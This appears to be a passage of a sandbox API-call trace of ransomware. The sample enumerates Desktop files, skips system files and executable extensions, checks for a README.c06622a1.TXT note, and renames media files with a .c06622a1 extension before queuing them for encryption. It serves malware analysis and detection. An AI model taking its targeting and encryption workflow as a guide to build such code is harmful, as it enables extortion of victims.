[0155.757] _wcsicmp (_Str1="drv", _Str2="jpg") returned -6 [0155.757] wcslen (_String="drv") returned 0x3 [0155.757] _wcsicmp (_Str1="exe", _Str2="jpg") returned -5 [0155.757] wcslen (_String="exe") returned 0x3 [0155.757] _wcsicmp (_Str1="hlp", _Str2="jpg") returned -2 [0155.757] wcslen (_String="hlp") returned 0x3 [0155.757] _wcsicmp (_Str1="icl", _Str2="jpg") returned -1 [0155.757] wcslen (_String="icl") returned 0x3 [0155.757] _wcsicmp (_Str1="icns", _Str2="jpg") returned -1 [0155.757] wcslen (_String="icns") returned 0x4 [0155.757] _wcsicmp (_Str1="ico", _Str2="jpg") returned -1 [0155.757] wcslen (_String="ico") returned 0x3 [0155.757] _wcsicmp (_Str1="ics", _Str2="jpg") returned -1 [0155.757] wcslen (_String="ics") returned 0x3 [0155.757] _wcsicmp (_Str1="idx", _Str2="jpg") returned -1 [0155.757] wcslen (_String="idx") returned 0x3 [0155.757] _wcsicmp (_Str1="ldf", _Str2="jpg") returned 2 [0155.757] wcslen (_String="ldf") returned 0x3 [0155.757] _wcsicmp (_Str1="lnk", _Str2="jpg") returned 2 [0155.757] wcslen (_String="lnk") returned 0x3 [0155.757] _wcsicmp (_Str1="mod", _Str2="jpg") returned 3 [0155.757] wcslen (_String="mod") returned 0x3 [0155.757] _wcsicmp (_Str1="mpa", _Str2="jpg") returned 3 [0155.757] wcslen (_String="mpa") returned 0x3 [0155.757] _wcsicmp (_Str1="msc", _Str2="jpg") returned 3 [0155.757] wcslen (_String="msc") returned 0x3 [0155.758] _wcsicmp (_Str1="msp", _Str2="jpg") returned 3 [0155.758] wcslen (_String="msp") returned 0x3 [0155.758] _wcsicmp (_Str1="msstyles", _Str2="jpg") returned 3 [0155.758] wcslen (_String="msstyles") returned 0x8 [0155.758] _wcsicmp (_Str1="msu", _Str2="jpg") returned 3 [0155.758] wcslen (_String="msu") returned 0x3 [0155.758] _wcsicmp (_Str1="nls", _Str2="jpg") returned 4 [0155.758] wcslen (_String="nls") returned 0x3 [0155.758] _wcsicmp (_Str1="nomedia", _Str2="jpg") returned 4 [0155.758] wcslen (_String="nomedia") returned 0x7 [0155.758] _wcsicmp (_Str1="ocx", _Str2="jpg") returned 5 [0155.758] wcslen (_String="ocx") returned 0x3 [0155.758] _wcsicmp (_Str1="prf", _Str2="jpg") returned 6 [0155.758] wcslen (_String="prf") returned 0x3 [0155.758] _wcsicmp (_Str1="ps1", _Str2="jpg") returned 6 [0155.758] wcslen (_String="ps1") returned 0x3 [0155.758] _wcsicmp (_Str1="rom", _Str2="jpg") returned 8 [0155.758] wcslen (_String="rom") returned 0x3 [0155.758] _wcsicmp (_Str1="rtp", _Str2="jpg") returned 8 [0155.758] wcslen (_String="rtp") returned 0x3 [0155.758] _wcsicmp (_Str1="scr", _Str2="jpg") returned 9 [0155.758] wcslen (_String="scr") returned 0x3 [0155.758] _wcsicmp (_Str1="shs", _Str2="jpg") returned 9 [0155.758] wcslen (_String="shs") returned 0x3 [0155.758] _wcsicmp (_Str1="spl", _Str2="jpg") returned 9 [0155.758] wcslen (_String="spl") returned 0x3 [0155.758] _wcsicmp (_Str1="sys", _Str2="jpg") returned 9 [0155.758] wcslen (_String="sys") returned 0x3 [0155.758] _wcsicmp (_Str1="theme", _Str2="jpg") returned 10 [0155.758] wcslen (_String="theme") returned 0x5 [0155.758] _wcsicmp (_Str1="themepack", _Str2="jpg") returned 10 [0155.758] wcslen (_String="themepack") returned 0x9 [0155.758] _wcsicmp (_Str1="wpx", _Str2="jpg") returned 13 [0155.758] wcslen (_String="wpx") returned 0x3 [0155.758] _wcsicmp (_Str1="lock", _Str2="jpg") returned 2 [0155.758] wcslen (_String="lock") returned 0x4 [0155.759] _wcsicmp (_Str1="key", _Str2="jpg") returned 1 [0155.759] wcslen (_String="key") returned 0x3 [0155.759] _wcsicmp (_Str1="hta", _Str2="jpg") returned -2 [0155.759] wcslen (_String="hta") returned 0x3 [0155.759] _wcsicmp (_Str1="msi", _Str2="jpg") returned 3 [0155.759] wcslen (_String="msi") returned 0x3 [0155.759] _wcsicmp (_Str1="pdb", _Str2="jpg") returned 6 [0155.759] wcslen (_String="pdb") returned 0x3 [0155.759] _wcsicmp (_Str1="sqlite", _Str2="jpg") returned 9 [0155.759] wcslen (_String="sqlite") returned 0x6 [0155.759] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0155.759] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0155.759] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0155.759] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0155.759] wcscpy (in: _Dest=0x208e74, _Source="0XvFdhIAi1nsFBCVZ.jpg" | out: _Dest="0XvFdhIAi1nsFBCVZ.jpg") returned="0XvFdhIAi1nsFBCVZ.jpg" [0155.759] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0XvFdhIAi1nsFBCVZ.jpg", dwFileAttributes=0x80) returned 1 [0155.759] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0XvFdhIAi1nsFBCVZ.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0xvfdhiai1nsfbcvz.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b8 [0155.760] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.760] ReadFile (in: hFile=0x1b8, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0155.760] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x9b0592da [0155.760] RtlComputeCrc32 (PartialCrc=0x92da, Buffer=0x32ec24, Length=0x80) returned 0x48aca6d5 [0155.760] RtlComputeCrc32 (PartialCrc=0xa6d5, Buffer=0x32ec24, Length=0x80) returned 0xe09f524f [0155.761] RtlComputeCrc32 (PartialCrc=0x524f, Buffer=0x32ec24, Length=0x80) returned 0x46cf6e49 [0155.761] RtlComputeCrc32 (PartialCrc=0x6e49, Buffer=0x32ec24, Length=0x80) returned 0x52e7890c [0155.761] CloseHandle (hObject=0x1b8) returned 1 [0155.761] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x218e28 [0155.761] wcscpy (in: _Dest=0x218e28, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0XvFdhIAi1nsFBCVZ.jpg" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0XvFdhIAi1nsFBCVZ.jpg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0XvFdhIAi1nsFBCVZ.jpg" [0155.761] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0XvFdhIAi1nsFBCVZ.jpg") returned 0x3f [0155.761] wcscpy (in: _Dest=0x218ea6, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.761] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0XvFdhIAi1nsFBCVZ.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0xvfdhiai1nsfbcvz.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0XvFdhIAi1nsFBCVZ.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0xvfdhiai1nsfbcvz.jpg.c06622a1"), dwFlags=0x8) returned 1 [0155.763] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0XvFdhIAi1nsFBCVZ.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0xvfdhiai1nsfbcvz.jpg.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1b8 [0155.763] CreateIoCompletionPort (FileHandle=0x1b8, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0155.764] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2b70020 [0155.770] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x15ae0007 [0155.770] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6825644f [0155.770] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x23ca28d [0155.770] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x66a88a7a [0155.770] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x45b02dd0 [0155.770] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3529e1d9 [0155.770] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x486fb34d [0155.770] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x10c12156 [0155.773] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2b70094, Length=0x80) returned 0x975b0d8e [0155.773] RtlComputeCrc32 (PartialCrc=0xd8e, Buffer=0x2b70094, Length=0x80) returned 0x7fddf06e [0155.774] RtlComputeCrc32 (PartialCrc=0xf06e, Buffer=0x2b70094, Length=0x80) returned 0xb2c6f328 [0155.774] RtlComputeCrc32 (PartialCrc=0xf328, Buffer=0x2b70094, Length=0x80) returned 0x6538299 [0155.774] RtlComputeCrc32 (PartialCrc=0x8299, Buffer=0x2b70094, Length=0x80) returned 0x65414d79 [0155.774] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0155.774] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0155.774] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x218e28) returned 1 [0155.774] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea9215f0, ftCreationTime.dwHighDateTime=0x1d5d7e6, ftLastAccessTime.dwLowDateTime=0x71235f00, ftLastAccessTime.dwHighDateTime=0x1d5da50, ftLastWriteTime.dwLowDateTime=0x71235f00, ftLastWriteTime.dwHighDateTime=0x1d5da50, nFileSizeHigh=0x0, nFileSizeLow=0xca7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="3BMM Q0bzkzLX0Gqw5.flv", cAlternateFileName="3BMMQ0~1.FLV")) returned 1 [0155.774] _wcsicmp (_Str1="3BMM Q0bzkzLX0Gqw5.flv", _Str2="README.c06622a1.TXT") returned -63 [0155.774] wcsstr (_Str="3BMM Q0bzkzLX0Gqw5.flv", _SubStr="README") returned 0x0 [0155.774] _wcsicmp (_Str1="autorun.inf", _Str2="3BMM Q0bzkzLX0Gqw5.flv") returned 46 [0155.774] wcslen (_String="autorun.inf") returned 0xb [0155.774] _wcsicmp (_Str1="boot.ini", _Str2="3BMM Q0bzkzLX0Gqw5.flv") returned 47 [0155.774] wcslen (_String="boot.ini") returned 0x8 [0155.774] _wcsicmp (_Str1="bootfont.bin", _Str2="3BMM Q0bzkzLX0Gqw5.flv") returned 47 [0155.774] wcslen (_String="bootfont.bin") returned 0xc [0155.774] _wcsicmp (_Str1="bootsect.bak", _Str2="3BMM Q0bzkzLX0Gqw5.flv") returned 47 [0155.774] wcslen (_String="bootsect.bak") returned 0xc [0155.774] _wcsicmp (_Str1="desktop.ini", _Str2="3BMM Q0bzkzLX0Gqw5.flv") returned 49 [0155.774] wcslen (_String="desktop.ini") returned 0xb [0155.774] _wcsicmp (_Str1="iconcache.db", _Str2="3BMM Q0bzkzLX0Gqw5.flv") returned 54 [0155.774] wcslen (_String="iconcache.db") returned 0xc [0155.774] _wcsicmp (_Str1="ntldr", _Str2="3BMM Q0bzkzLX0Gqw5.flv") returned 59 [0155.774] wcslen (_String="ntldr") returned 0x5 [0155.774] _wcsicmp (_Str1="ntuser.dat", _Str2="3BMM Q0bzkzLX0Gqw5.flv") returned 59 [0155.774] wcslen (_String="ntuser.dat") returned 0xa [0155.774] _wcsicmp (_Str1="ntuser.dat.log", _Str2="3BMM Q0bzkzLX0Gqw5.flv") returned 59 [0155.774] wcslen (_String="ntuser.dat.log") returned 0xe [0155.774] _wcsicmp (_Str1="ntuser.ini", _Str2="3BMM Q0bzkzLX0Gqw5.flv") returned 59 [0155.774] wcslen (_String="ntuser.ini") returned 0xa [0155.774] _wcsicmp (_Str1="thumbs.db", _Str2="3BMM Q0bzkzLX0Gqw5.flv") returned 65 [0155.774] wcslen (_String="thumbs.db") returned 0x9 [0155.775] _wcsicmp (_Str1="386", _Str2="flv") returned -51 [0155.775] wcslen (_String="386") returned 0x3 [0155.775] _wcsicmp (_Str1="adv", _Str2="flv") returned -5 [0155.775] wcslen (_String="adv") returned 0x3 [0155.775] _wcsicmp (_Str1="ani", _Str2="flv") returned -5 [0155.775] wcslen (_String="ani") returned 0x3 [0155.775] _wcsicmp (_Str1="bat", _Str2="flv") returned -4 [0155.775] wcslen (_String="bat") returned 0x3 [0155.775] _wcsicmp (_Str1="bin", _Str2="flv") returned -4 [0155.775] wcslen (_String="bin") returned 0x3 [0155.775] _wcsicmp (_Str1="cab", _Str2="flv") returned -3 [0155.775] wcslen (_String="cab") returned 0x3 [0155.775] _wcsicmp (_Str1="cmd", _Str2="flv") returned -3 [0155.775] wcslen (_String="cmd") returned 0x3 [0155.775] _wcsicmp (_Str1="com", _Str2="flv") returned -3 [0155.775] wcslen (_String="com") returned 0x3 [0155.775] _wcsicmp (_Str1="cpl", _Str2="flv") returned -3 [0155.775] wcslen (_String="cpl") returned 0x3 [0155.775] _wcsicmp (_Str1="cur", _Str2="flv") returned -3 [0155.775] wcslen (_String="cur") returned 0x3 [0155.775] _wcsicmp (_Str1="deskthemepack", _Str2="flv") returned -2 [0155.775] wcslen (_String="deskthemepack") returned 0xd [0155.775] _wcsicmp (_Str1="diagcab", _Str2="flv") returned -2 [0155.775] wcslen (_String="diagcab") returned 0x7 [0155.775] _wcsicmp (_Str1="diagcfg", _Str2="flv") returned -2 [0155.775] wcslen (_String="diagcfg") returned 0x7 [0155.775] _wcsicmp (_Str1="diagpkg", _Str2="flv") returned -2 [0155.775] wcslen (_String="diagpkg") returned 0x7 [0155.775] _wcsicmp (_Str1="dll", _Str2="flv") returned -2 [0155.775] wcslen (_String="dll") returned 0x3 [0155.775] _wcsicmp (_Str1="drv", _Str2="flv") returned -2 [0155.775] wcslen (_String="drv") returned 0x3 [0155.775] _wcsicmp (_Str1="exe", _Str2="flv") returned -1 [0155.775] wcslen (_String="exe") returned 0x3 [0155.775] _wcsicmp (_Str1="hlp", _Str2="flv") returned 2 [0155.775] wcslen (_String="hlp") returned 0x3 [0155.776] _wcsicmp (_Str1="icl", _Str2="flv") returned 3 [0155.776] wcslen (_String="icl") returned 0x3 [0155.776] _wcsicmp (_Str1="icns", _Str2="flv") returned 3 [0155.776] wcslen (_String="icns") returned 0x4 [0155.776] _wcsicmp (_Str1="ico", _Str2="flv") returned 3 [0155.776] wcslen (_String="ico") returned 0x3 [0155.776] _wcsicmp (_Str1="ics", _Str2="flv") returned 3 [0155.776] wcslen (_String="ics") returned 0x3 [0155.776] _wcsicmp (_Str1="idx", _Str2="flv") returned 3 [0155.776] wcslen (_String="idx") returned 0x3 [0155.776] _wcsicmp (_Str1="ldf", _Str2="flv") returned 6 [0155.776] wcslen (_String="ldf") returned 0x3 [0155.776] _wcsicmp (_Str1="lnk", _Str2="flv") returned 6 [0155.776] wcslen (_String="lnk") returned 0x3 [0155.776] _wcsicmp (_Str1="mod", _Str2="flv") returned 7 [0155.776] wcslen (_String="mod") returned 0x3 [0155.776] _wcsicmp (_Str1="mpa", _Str2="flv") returned 7 [0155.776] wcslen (_String="mpa") returned 0x3 [0155.776] _wcsicmp (_Str1="msc", _Str2="flv") returned 7 [0155.776] wcslen (_String="msc") returned 0x3 [0155.776] _wcsicmp (_Str1="msp", _Str2="flv") returned 7 [0155.776] wcslen (_String="msp") returned 0x3 [0155.776] _wcsicmp (_Str1="msstyles", _Str2="flv") returned 7 [0155.776] wcslen (_String="msstyles") returned 0x8 [0155.776] _wcsicmp (_Str1="msu", _Str2="flv") returned 7 [0155.776] wcslen (_String="msu") returned 0x3 [0155.776] _wcsicmp (_Str1="nls", _Str2="flv") returned 8 [0155.776] wcslen (_String="nls") returned 0x3 [0155.776] _wcsicmp (_Str1="nomedia", _Str2="flv") returned 8 [0155.776] wcslen (_String="nomedia") returned 0x7 [0155.776] _wcsicmp (_Str1="ocx", _Str2="flv") returned 9 [0155.776] wcslen (_String="ocx") returned 0x3 [0155.776] _wcsicmp (_Str1="prf", _Str2="flv") returned 10 [0155.776] wcslen (_String="prf") returned 0x3 [0155.776] _wcsicmp (_Str1="ps1", _Str2="flv") returned 10 [0155.776] wcslen (_String="ps1") returned 0x3 [0155.776] _wcsicmp (_Str1="rom", _Str2="flv") returned 12 [0155.776] wcslen (_String="rom") returned 0x3 [0155.777] _wcsicmp (_Str1="rtp", _Str2="flv") returned 12 [0155.777] wcslen (_String="rtp") returned 0x3 [0155.777] _wcsicmp (_Str1="scr", _Str2="flv") returned 13 [0155.777] wcslen (_String="scr") returned 0x3 [0155.777] _wcsicmp (_Str1="shs", _Str2="flv") returned 13 [0155.777] wcslen (_String="shs") returned 0x3 [0155.777] _wcsicmp (_Str1="spl", _Str2="flv") returned 13 [0155.777] wcslen (_String="spl") returned 0x3 [0155.777] _wcsicmp (_Str1="sys", _Str2="flv") returned 13 [0155.777] wcslen (_String="sys") returned 0x3 [0155.777] _wcsicmp (_Str1="theme", _Str2="flv") returned 14 [0155.777] wcslen (_String="theme") returned 0x5 [0155.777] _wcsicmp (_Str1="themepack", _Str2="flv") returned 14 [0155.777] wcslen (_String="themepack") returned 0x9 [0155.777] _wcsicmp (_Str1="wpx", _Str2="flv") returned 17 [0155.777] wcslen (_String="wpx") returned 0x3 [0155.777] _wcsicmp (_Str1="lock", _Str2="flv") returned 6 [0155.777] wcslen (_String="lock") returned 0x4 [0155.777] _wcsicmp (_Str1="key", _Str2="flv") returned 5 [0155.777] wcslen (_String="key") returned 0x3 [0155.777] _wcsicmp (_Str1="hta", _Str2="flv") returned 2 [0155.777] wcslen (_String="hta") returned 0x3 [0155.777] _wcsicmp (_Str1="msi", _Str2="flv") returned 7 [0155.777] wcslen (_String="msi") returned 0x3 [0155.777] _wcsicmp (_Str1="pdb", _Str2="flv") returned 10 [0155.777] wcslen (_String="pdb") returned 0x3 [0155.777] _wcsicmp (_Str1="sqlite", _Str2="flv") returned 13 [0155.777] wcslen (_String="sqlite") returned 0x6 [0155.777] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0155.777] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0155.777] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0155.777] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0155.778] wcscpy (in: _Dest=0x208e74, _Source="3BMM Q0bzkzLX0Gqw5.flv" | out: _Dest="3BMM Q0bzkzLX0Gqw5.flv") returned="3BMM Q0bzkzLX0Gqw5.flv" [0155.778] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3BMM Q0bzkzLX0Gqw5.flv", dwFileAttributes=0x80) returned 1 [0155.778] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3BMM Q0bzkzLX0Gqw5.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3bmm q0bzkzlx0gqw5.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0155.778] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.778] ReadFile (in: hFile=0x19c, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0155.779] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x92032f79 [0155.779] RtlComputeCrc32 (PartialCrc=0x2f79, Buffer=0x32ec24, Length=0x80) returned 0x57f51ae4 [0155.779] RtlComputeCrc32 (PartialCrc=0x1ae4, Buffer=0x32ec24, Length=0x80) returned 0x6d48fed8 [0155.779] RtlComputeCrc32 (PartialCrc=0xfed8, Buffer=0x32ec24, Length=0x80) returned 0xe14e29f2 [0155.779] RtlComputeCrc32 (PartialCrc=0x29f2, Buffer=0x32ec24, Length=0x80) returned 0x49586ea2 [0155.779] CloseHandle (hObject=0x19c) returned 1 [0155.779] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x218e28 [0155.779] wcscpy (in: _Dest=0x218e28, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3BMM Q0bzkzLX0Gqw5.flv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3BMM Q0bzkzLX0Gqw5.flv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3BMM Q0bzkzLX0Gqw5.flv" [0155.779] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3BMM Q0bzkzLX0Gqw5.flv") returned 0x40 [0155.779] wcscpy (in: _Dest=0x218ea8, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.779] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3BMM Q0bzkzLX0Gqw5.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3bmm q0bzkzlx0gqw5.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3BMM Q0bzkzLX0Gqw5.flv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3bmm q0bzkzlx0gqw5.flv.c06622a1"), dwFlags=0x8) returned 1 [0155.781] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3BMM Q0bzkzLX0Gqw5.flv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3bmm q0bzkzlx0gqw5.flv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x19c [0155.781] CreateIoCompletionPort (FileHandle=0x19c, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0155.781] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3480020 [0155.788] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x645928af [0155.788] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x54bdbe75 [0155.788] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4e909be0 [0155.788] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x47c7d2c3 [0155.788] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7b29d141 [0155.788] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x54bdbe75 [0155.788] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3f80062b [0155.788] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x42564427 [0155.791] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3480094, Length=0x80) returned 0xe01a7f2f [0155.791] RtlComputeCrc32 (PartialCrc=0x7f2f, Buffer=0x3480094, Length=0x80) returned 0xab28a518 [0155.791] RtlComputeCrc32 (PartialCrc=0xa518, Buffer=0x3480094, Length=0x80) returned 0x2ba77915 [0155.791] RtlComputeCrc32 (PartialCrc=0x7915, Buffer=0x3480094, Length=0x80) returned 0x2839aa92 [0155.791] RtlComputeCrc32 (PartialCrc=0xaa92, Buffer=0x3480094, Length=0x80) returned 0x42801b44 [0155.792] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3480020) returned 1 [0155.792] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0155.792] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x218e28) returned 1 [0155.792] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3654aa30, ftCreationTime.dwHighDateTime=0x1d5e56a, ftLastAccessTime.dwLowDateTime=0xc27228e0, ftLastAccessTime.dwHighDateTime=0x1d5e073, ftLastWriteTime.dwLowDateTime=0xc27228e0, ftLastWriteTime.dwHighDateTime=0x1d5e073, nFileSizeHigh=0x0, nFileSizeLow=0xc963, dwReserved0=0x0, dwReserved1=0x0, cFileName="5KWbxml7IT.bmp", cAlternateFileName="5KWBXM~1.BMP")) returned 1 [0155.792] _wcsicmp (_Str1="5KWbxml7IT.bmp", _Str2="README.c06622a1.TXT") returned -61 [0155.792] wcsstr (_Str="5KWbxml7IT.bmp", _SubStr="README") returned 0x0 [0155.792] _wcsicmp (_Str1="autorun.inf", _Str2="5KWbxml7IT.bmp") returned 44 [0155.792] wcslen (_String="autorun.inf") returned 0xb [0155.792] _wcsicmp (_Str1="boot.ini", _Str2="5KWbxml7IT.bmp") returned 45 [0155.792] wcslen (_String="boot.ini") returned 0x8 [0155.792] _wcsicmp (_Str1="bootfont.bin", _Str2="5KWbxml7IT.bmp") returned 45 [0155.792] wcslen (_String="bootfont.bin") returned 0xc [0155.792] _wcsicmp (_Str1="bootsect.bak", _Str2="5KWbxml7IT.bmp") returned 45 [0155.792] wcslen (_String="bootsect.bak") returned 0xc [0155.792] _wcsicmp (_Str1="desktop.ini", _Str2="5KWbxml7IT.bmp") returned 47 [0155.792] wcslen (_String="desktop.ini") returned 0xb [0155.792] _wcsicmp (_Str1="iconcache.db", _Str2="5KWbxml7IT.bmp") returned 52 [0155.792] wcslen (_String="iconcache.db") returned 0xc [0155.792] _wcsicmp (_Str1="ntldr", _Str2="5KWbxml7IT.bmp") returned 57 [0155.792] wcslen (_String="ntldr") returned 0x5 [0155.792] _wcsicmp (_Str1="ntuser.dat", _Str2="5KWbxml7IT.bmp") returned 57 [0155.792] wcslen (_String="ntuser.dat") returned 0xa [0155.792] _wcsicmp (_Str1="ntuser.dat.log", _Str2="5KWbxml7IT.bmp") returned 57 [0155.792] wcslen (_String="ntuser.dat.log") returned 0xe [0155.792] _wcsicmp (_Str1="ntuser.ini", _Str2="5KWbxml7IT.bmp") returned 57 [0155.792] wcslen (_String="ntuser.ini") returned 0xa [0155.792] _wcsicmp (_Str1="thumbs.db", _Str2="5KWbxml7IT.bmp") returned 63 [0155.792] wcslen (_String="thumbs.db") returned 0x9 [0155.792] _wcsicmp (_Str1="386", _Str2="bmp") returned -47 [0155.792] wcslen (_String="386") returned 0x3 [0155.793] _wcsicmp (_Str1="adv", _Str2="bmp") returned -1 [0155.793] wcslen (_String="adv") returned 0x3 [0155.793] _wcsicmp (_Str1="ani", _Str2="bmp") returned -1 